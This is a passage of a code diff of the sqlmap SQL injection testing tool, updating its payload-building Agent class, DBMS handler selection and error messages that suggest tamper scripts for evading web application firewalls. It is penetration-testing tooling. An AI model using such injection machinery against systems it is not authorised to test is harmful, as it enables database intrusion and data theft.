test = _randomFillBlankFields(test)
|
test = _randomFillBlankFields(test)
|
||||||
@@ -402,8 +408,7 @@ def start():
|
|||||||
if conf.nullConnection:
|
if conf.nullConnection:
|
||||||
checkNullConnection()
|
checkNullConnection()
|
||||||
|
|
||||||
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) \
|
if (len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None)) and (kb.injection.place is None or kb.injection.parameter is None):
|
||||||
and (kb.injection.place is None or kb.injection.parameter is None):
|
|
||||||
|
|
||||||
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
if not any((conf.string, conf.notString, conf.regexp)) and PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
||||||
# NOTE: this is not needed anymore, leaving only to display
|
# NOTE: this is not needed anymore, leaving only to display
|
||||||
@@ -581,11 +586,11 @@ def start():
|
|||||||
errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
|
errMsg += "(e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')"
|
||||||
raise SqlmapNoneDataException(errMsg)
|
raise SqlmapNoneDataException(errMsg)
|
||||||
else:
|
else:
|
||||||
errMsg = "all tested parameters appear to be not injectable."
|
errMsg = "all tested parameters do not appear to be injectable."
|
||||||
|
|
||||||
if conf.level < 5 or conf.risk < 3:
|
if conf.level < 5 or conf.risk < 3:
|
||||||
errMsg += " Try to increase '--level'/'--risk' values "
|
errMsg += " Try to increase values for '--level'/'--risk' options "
|
||||||
errMsg += "to perform more tests."
|
errMsg += "if you wish to perform more tests."
|
||||||
|
|
||||||
if isinstance(conf.tech, list) and len(conf.tech) < 5:
|
if isinstance(conf.tech, list) and len(conf.tech) < 5:
|
||||||
errMsg += " Rerun without providing the option '--technique'."
|
errMsg += " Rerun without providing the option '--technique'."
|
||||||
@@ -608,15 +613,9 @@ def start():
|
|||||||
|
|
||||||
if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
|
if kb.heuristicTest == HEURISTIC_TEST.POSITIVE:
|
||||||
errMsg += " As heuristic test turned out positive you are "
|
errMsg += " As heuristic test turned out positive you are "
|
||||||
errMsg += "strongly advised to continue on with the tests. "
|
errMsg += "strongly advised to continue on with the tests."
|
||||||
errMsg += "Please, consider usage of tampering scripts as "
|
|
||||||
errMsg += "your target might filter the queries."
|
|
||||||
|
|
||||||
if not conf.string and not conf.notString and not conf.regexp:
|
if conf.string:
|
||||||
errMsg += " Also, you can try to rerun by providing "
|
|
||||||
errMsg += "either a valid value for option '--string' "
|
|
||||||
errMsg += "(or '--regexp')."
|
|
||||||
elif conf.string:
|
|
||||||
errMsg += " Also, you can try to rerun by providing a "
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
errMsg += "valid value for option '--string' as perhaps the string you "
|
errMsg += "valid value for option '--string' as perhaps the string you "
|
||||||
errMsg += "have chosen does not match "
|
errMsg += "have chosen does not match "
|
||||||
@@ -629,8 +628,8 @@ def start():
|
|||||||
|
|
||||||
if not conf.tamper:
|
if not conf.tamper:
|
||||||
errMsg += " If you suspect that there is some kind of protection mechanism "
|
errMsg += " If you suspect that there is some kind of protection mechanism "
|
||||||
errMsg += "involved (e.g. WAF) maybe you could retry "
|
errMsg += "involved (e.g. WAF) maybe you could try to use "
|
||||||
errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
|
errMsg += "option '--tamper' (e.g. '--tamper=space2comment')"
|
||||||
|
|
||||||
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
raise SqlmapNotVulnerableException(errMsg.rstrip('.'))
|
||||||
else:
|
else:
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
@@ -56,19 +56,19 @@ def setHandler():
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
items = [
|
items = [
|
||||||
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
|
(DBMS.MYSQL, MYSQL_ALIASES, MySQLMap, MySQLConn),
|
||||||
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
|
(DBMS.ORACLE, ORACLE_ALIASES, OracleMap, OracleConn),
|
||||||
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
|
(DBMS.PGSQL, PGSQL_ALIASES, PostgreSQLMap, PostgreSQLConn),
|
||||||
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
|
(DBMS.MSSQL, MSSQL_ALIASES, MSSQLServerMap, MSSQLServerConn),
|
||||||
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
|
(DBMS.SQLITE, SQLITE_ALIASES, SQLiteMap, SQLiteConn),
|
||||||
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
|
(DBMS.ACCESS, ACCESS_ALIASES, AccessMap, AccessConn),
|
||||||
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
|
(DBMS.FIREBIRD, FIREBIRD_ALIASES, FirebirdMap, FirebirdConn),
|
||||||
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
|
(DBMS.MAXDB, MAXDB_ALIASES, MaxDBMap, MaxDBConn),
|
||||||
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
|
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
|
||||||
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
|
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
|
||||||
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
|
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
|
||||||
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
|
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
|
||||||
]
|
]
|
||||||
|
|
||||||
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
|
_ = max(_ if (conf.get("dbms") or Backend.getIdentifiedDbms() or kb.heuristicExtendedDbms or "").lower() in _[1] else None for _ in items)
|
||||||
if _:
|
if _:
|
||||||
@@ -76,6 +76,16 @@ def setHandler():
|
|||||||
items.insert(0, _)
|
items.insert(0, _)
|
||||||
|
|
||||||
for dbms, aliases, Handler, Connector in items:
|
for dbms, aliases, Handler, Connector in items:
|
||||||
|
if conf.forceDbms:
|
||||||
|
if conf.forceDbms.lower() not in aliases:
|
||||||
|
continue
|
||||||
|
else:
|
||||||
|
kb.dbms = conf.dbms = conf.forceDbms = dbms
|
||||||
|
|
||||||
|
if kb.dbmsFilter:
|
||||||
|
if dbms not in kb.dbmsFilter:
|
||||||
|
continue
|
||||||
|
|
||||||
handler = Handler()
|
handler = Handler()
|
||||||
conf.dbmsConnector = Connector()
|
conf.dbmsConnector = Connector()
|
||||||
|
|
||||||
@@ -96,7 +106,7 @@ def setHandler():
|
|||||||
else:
|
else:
|
||||||
conf.dbmsConnector.connect()
|
conf.dbmsConnector.connect()
|
||||||
|
|
||||||
if handler.checkDbms():
|
if conf.forceDbms == dbms or handler.checkDbms():
|
||||||
if kb.resolutionDbms:
|
if kb.resolutionDbms:
|
||||||
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
|
conf.dbmsHandler = max(_ for _ in items if _[0] == kb.resolutionDbms)[2]()
|
||||||
else:
|
else:
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@@ -39,6 +39,7 @@ from lib.core.settings import BOUNDED_INJECTION_MARKER
|
|||||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||||
|
from lib.core.settings import INFERENCE_MARKER
|
||||||
from lib.core.settings import NULL
|
from lib.core.settings import NULL
|
||||||
from lib.core.settings import PAYLOAD_DELIMITER
|
from lib.core.settings import PAYLOAD_DELIMITER
|
||||||
from lib.core.settings import REPLACEMENT_MARKER
|
from lib.core.settings import REPLACEMENT_MARKER
|
||||||
@@ -96,6 +97,7 @@ class Agent(object):
|
|||||||
paramString = conf.parameters[place]
|
paramString = conf.parameters[place]
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
origValue = getUnicode(paramDict[parameter])
|
origValue = getUnicode(paramDict[parameter])
|
||||||
|
newValue = getUnicode(newValue) if newValue else newValue
|
||||||
|
|
||||||
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
@@ -104,7 +106,7 @@ class Agent(object):
|
|||||||
else:
|
else:
|
||||||
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
||||||
origValue = origValue[origValue.rfind('/') + 1:]
|
origValue = origValue[origValue.rfind('/') + 1:]
|
||||||
for char in ('?', '=', ':'):
|
for char in ('?', '=', ':', ','):
|
||||||
if char in origValue:
|
if char in origValue:
|
||||||
origValue = origValue[origValue.rfind(char) + 1:]
|
origValue = origValue[origValue.rfind(char) + 1:]
|
||||||
elif place == PLACE.CUSTOM_POST:
|
elif place == PLACE.CUSTOM_POST:
|
||||||
@@ -113,15 +115,15 @@ class Agent(object):
|
|||||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||||
origValue = origValue.split('>')[-1]
|
origValue = origValue.split('>')[-1]
|
||||||
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
|
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)[\s:]*(?P<result>[^"\[,]+\Z)', origValue)
|
||||||
else:
|
else:
|
||||||
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
||||||
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
||||||
elif place == PLACE.CUSTOM_HEADER:
|
elif place == PLACE.CUSTOM_HEADER:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
origValue = origValue.split(kb.customInjectionMark)[0]
|
|
||||||
origValue = origValue[origValue.find(',') + 1:]
|
origValue = origValue[origValue.find(',') + 1:]
|
||||||
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
|
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||||
|
match = re.search(r"([^;]+)=(?P<value>[^;]*);?\Z", origValue)
|
||||||
if match:
|
if match:
|
||||||
origValue = match.group("value")
|
origValue = match.group("value")
|
||||||
elif ',' in paramString:
|
elif ',' in paramString:
|
||||||
@@ -137,10 +139,10 @@ class Agent(object):
|
|||||||
value = origValue
|
value = origValue
|
||||||
elif where == PAYLOAD.WHERE.NEGATIVE:
|
elif where == PAYLOAD.WHERE.NEGATIVE:
|
||||||
if conf.invalidLogical:
|
if conf.invalidLogical:
|
||||||
match = re.search(r'\A[^ ]+', newValue)
|
match = re.search(r"\A[^ ]+", newValue)
|
||||||
newValue = newValue[len(match.group() if match else ""):]
|
newValue = newValue[len(match.group() if match else ""):]
|
||||||
_ = randomInt(2)
|
_ = randomInt(2)
|
||||||
value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1)
|
value = "%s%s AND %s LIKE %s" % (origValue, match.group() if match else "", _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
value = randomInt(6)
|
value = randomInt(6)
|
||||||
elif conf.invalidString:
|
elif conf.invalidString:
|
||||||
@@ -169,8 +171,7 @@ class Agent(object):
|
|||||||
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
||||||
retVal = retVal.replace(kb.customInjectionMark, "").replace(REPLACEMENT_MARKER, kb.customInjectionMark)
|
retVal = retVal.replace(kb.customInjectionMark, "").replace(REPLACEMENT_MARKER, kb.customInjectionMark)
|
||||||
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
|
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
|
||||||
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
|
retVal = paramString.replace("%s%s" % (origValue, BOUNDED_INJECTION_MARKER), self.addPayloadDelimiters(newValue))
|
||||||
retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue)))
|
|
||||||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||||
else:
|
else:
|
||||||
@@ -197,7 +198,7 @@ class Agent(object):
|
|||||||
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
||||||
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
||||||
else:
|
else:
|
||||||
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), r"%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString)
|
||||||
|
|
||||||
if retVal == paramString and urlencode(parameter) != parameter:
|
if retVal == paramString and urlencode(parameter) != parameter:
|
||||||
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
|
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString)
|
||||||
@@ -207,16 +208,6 @@ class Agent(object):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def fullPayload(self, query):
|
|
||||||
if conf.direct:
|
|
||||||
return self.payloadDirect(query)
|
|
||||||
|
|
||||||
query = self.prefixQuery(query)
|
|
||||||
query = self.suffixQuery(query)
|
|
||||||
payload = self.payload(newValue=query)
|
|
||||||
|
|
||||||
return payload
|
|
||||||
|
|
||||||
def prefixQuery(self, expression, prefix=None, where=None, clause=None):
|
def prefixQuery(self, expression, prefix=None, where=None, clause=None):
|
||||||
"""
|
"""
|
||||||
This method defines how the input expression has to be escaped
|
This method defines how the input expression has to be escaped
|
||||||
@@ -303,24 +294,28 @@ class Agent(object):
|
|||||||
if payload is None:
|
if payload is None:
|
||||||
return
|
return
|
||||||
|
|
||||||
_ = (
|
replacements = (
|
||||||
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
|
("[DELIMITER_START]", kb.chars.start),
|
||||||
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
|
("[DELIMITER_STOP]", kb.chars.stop),
|
||||||
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
("[AT_REPLACE]", kb.chars.at),
|
||||||
)
|
("[SPACE_REPLACE]", kb.chars.space),
|
||||||
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
|
("[DOLLAR_REPLACE]", kb.chars.dollar),
|
||||||
|
("[HASH_REPLACE]", kb.chars.hash_),
|
||||||
|
("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
|
||||||
|
)
|
||||||
|
payload = reduce(lambda x, y: x.replace(y[0], y[1]), replacements, payload)
|
||||||
|
|
||||||
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
|
for _ in set(re.findall(r"(?i)\[RANDNUM(?:\d+)?\]", payload)):
|
||||||
payload = payload.replace(_, str(randomInt()))
|
payload = payload.replace(_, str(randomInt()))
|
||||||
|
|
||||||
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
|
for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
|
||||||
payload = payload.replace(_, randomStr())
|
payload = payload.replace(_, randomStr())
|
||||||
|
|
||||||
if origValue is not None and "[ORIGVALUE]" in payload:
|
if origValue is not None and "[ORIGVALUE]" in payload:
|
||||||
origValue = getUnicode(origValue)
|
origValue = getUnicode(origValue)
|
||||||
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
|
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
|
||||||
|
|
||||||
if "[INFERENCE]" in payload:
|
if INFERENCE_MARKER in payload:
|
||||||
if Backend.getIdentifiedDbms() is not None:
|
if Backend.getIdentifiedDbms() is not None:
|
||||||
inference = queries[Backend.getIdentifiedDbms()].inference
|
inference = queries[Backend.getIdentifiedDbms()].inference
|
||||||
|
|
||||||
@@ -332,7 +327,7 @@ class Agent(object):
|
|||||||
else:
|
else:
|
||||||
inferenceQuery = inference.query
|
inferenceQuery = inference.query
|
||||||
|
|
||||||
payload = payload.replace("[INFERENCE]", inferenceQuery)
|
payload = payload.replace(INFERENCE_MARKER, inferenceQuery)
|
||||||
elif not kb.testMode:
|
elif not kb.testMode:
|
||||||
errMsg = "invalid usage of inference payload without "
|
errMsg = "invalid usage of inference payload without "
|
||||||
errMsg += "knowledge of underlying DBMS"
|
errMsg += "knowledge of underlying DBMS"
|
||||||
@@ -371,7 +366,7 @@ class Agent(object):
|
|||||||
rootQuery = queries[Backend.getIdentifiedDbms()]
|
rootQuery = queries[Backend.getIdentifiedDbms()]
|
||||||
hexField = field
|
hexField = field
|
||||||
|
|
||||||
if 'hex' in rootQuery:
|
if "hex" in rootQuery:
|
||||||
hexField = rootQuery.hex.query % field
|
hexField = rootQuery.hex.query % field
|
||||||
else:
|
else:
|
||||||
warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
|
warnMsg = "switch '--hex' is currently not supported on DBMS %s" % Backend.getIdentifiedDbms()
|
||||||
@@ -540,7 +535,7 @@ class Agent(object):
|
|||||||
fieldsToCastStr = fieldsToCastStr or ""
|
fieldsToCastStr = fieldsToCastStr or ""
|
||||||
|
|
||||||
# Function
|
# Function
|
||||||
if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
|
if re.search(r"\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
|
||||||
fieldsToCastList = [fieldsToCastStr]
|
fieldsToCastList = [fieldsToCastStr]
|
||||||
else:
|
else:
|
||||||
fieldsToCastList = splitFields(fieldsToCastStr)
|
fieldsToCastList = splitFields(fieldsToCastStr)
|
||||||
@@ -632,7 +627,7 @@ class Agent(object):
|
|||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
|
||||||
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
|
||||||
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery)
|
concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), r"\g<2>\g<1>\g<3>", concatenatedQuery)
|
||||||
elif fieldsSelect:
|
elif fieldsSelect:
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "||'%s'" % kb.chars.stop
|
concatenatedQuery += "||'%s'" % kb.chars.stop
|
||||||
@@ -644,7 +639,7 @@ class Agent(object):
|
|||||||
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.chars.start, 1)
|
||||||
concatenatedQuery += "+'%s'" % kb.chars.stop
|
concatenatedQuery += "+'%s'" % kb.chars.stop
|
||||||
elif fieldsSelectTop:
|
elif fieldsSelectTop:
|
||||||
topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
|
topNum = re.search(r"\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
|
||||||
concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1)
|
concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.chars.start), 1)
|
||||||
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
|
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.chars.stop, 1)
|
||||||
elif fieldsSelectCase:
|
elif fieldsSelectCase:
|
||||||
@@ -756,13 +751,13 @@ class Agent(object):
|
|||||||
if fromTable and query.endswith(fromTable):
|
if fromTable and query.endswith(fromTable):
|
||||||
query = query[:-len(fromTable)]
|
query = query[:-len(fromTable)]
|
||||||
|
|
||||||
topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
|
topNumRegex = re.search(r"\ATOP\s+([\d]+)\s+", query, re.I)
|
||||||
if topNumRegex:
|
if topNumRegex:
|
||||||
topNum = topNumRegex.group(1)
|
topNum = topNumRegex.group(1)
|
||||||
query = query[len("TOP %s " % topNum):]
|
query = query[len("TOP %s " % topNum):]
|
||||||
unionQuery += "TOP %s " % topNum
|
unionQuery += "TOP %s " % topNum
|
||||||
|
|
||||||
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
|
intoRegExp = re.search(r"(\s+INTO (DUMP|OUT)FILE\s+'(.+?)')", query, re.I)
|
||||||
|
|
||||||
if intoRegExp:
|
if intoRegExp:
|
||||||
intoRegExp = intoRegExp.group(1)
|
intoRegExp = intoRegExp.group(1)
|
||||||
@@ -810,7 +805,7 @@ class Agent(object):
|
|||||||
stopLimit = None
|
stopLimit = None
|
||||||
limitCond = True
|
limitCond = True
|
||||||
|
|
||||||
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
|
topLimit = re.search(r"TOP\s+([\d]+)\s+", expression, re.I)
|
||||||
|
|
||||||
limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
|
limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
|
||||||
|
|
||||||
@@ -937,7 +932,7 @@ class Agent(object):
|
|||||||
limitedQuery += " %s" % limitStr
|
limitedQuery += " %s" % limitStr
|
||||||
|
|
||||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2):
|
||||||
if not " ORDER BY " in limitedQuery:
|
if " ORDER BY " not in limitedQuery:
|
||||||
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
|
limitStr = limitStr.replace(") WHERE LIMIT", " ORDER BY 1 ASC) WHERE LIMIT")
|
||||||
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
elif " ORDER BY " in limitedQuery and "SELECT " in limitedQuery:
|
||||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||||
@@ -958,7 +953,7 @@ class Agent(object):
|
|||||||
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
|
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
|
||||||
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
|
||||||
|
|
||||||
notDistincts = re.findall("DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
|
notDistincts = re.findall(r"DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
|
||||||
|
|
||||||
for notDistinct in notDistincts:
|
for notDistinct in notDistincts:
|
||||||
limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
|
limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
|
||||||
@@ -975,7 +970,7 @@ class Agent(object):
|
|||||||
limitedQuery = limitedQuery.replace(" (SELECT TOP %s" % startTopNums, " (SELECT TOP %d" % num)
|
limitedQuery = limitedQuery.replace(" (SELECT TOP %s" % startTopNums, " (SELECT TOP %d" % num)
|
||||||
forgeNotIn = False
|
forgeNotIn = False
|
||||||
else:
|
else:
|
||||||
topNum = re.search("TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
|
topNum = re.search(r"TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
|
||||||
limitedQuery = limitedQuery.replace("TOP %s " % topNum, "")
|
limitedQuery = limitedQuery.replace("TOP %s " % topNum, "")
|
||||||
|
|
||||||
if forgeNotIn:
|
if forgeNotIn:
|
||||||
@@ -991,7 +986,7 @@ class Agent(object):
|
|||||||
limitedQuery += "NOT IN (%s" % (limitStr % num)
|
limitedQuery += "NOT IN (%s" % (limitStr % num)
|
||||||
limitedQuery += "%s %s ORDER BY %s) ORDER BY %s" % (self.nullAndCastField(uniqueField or field), fromFrom, uniqueField or "1", uniqueField or "1")
|
limitedQuery += "%s %s ORDER BY %s) ORDER BY %s" % (self.nullAndCastField(uniqueField or field), fromFrom, uniqueField or "1", uniqueField or "1")
|
||||||
else:
|
else:
|
||||||
match = re.search(" ORDER BY (\w+)\Z", query)
|
match = re.search(r" ORDER BY (\w+)\Z", query)
|
||||||
field = match.group(1) if match else field
|
field = match.group(1) if match else field
|
||||||
|
|
||||||
if " WHERE " in limitedQuery:
|
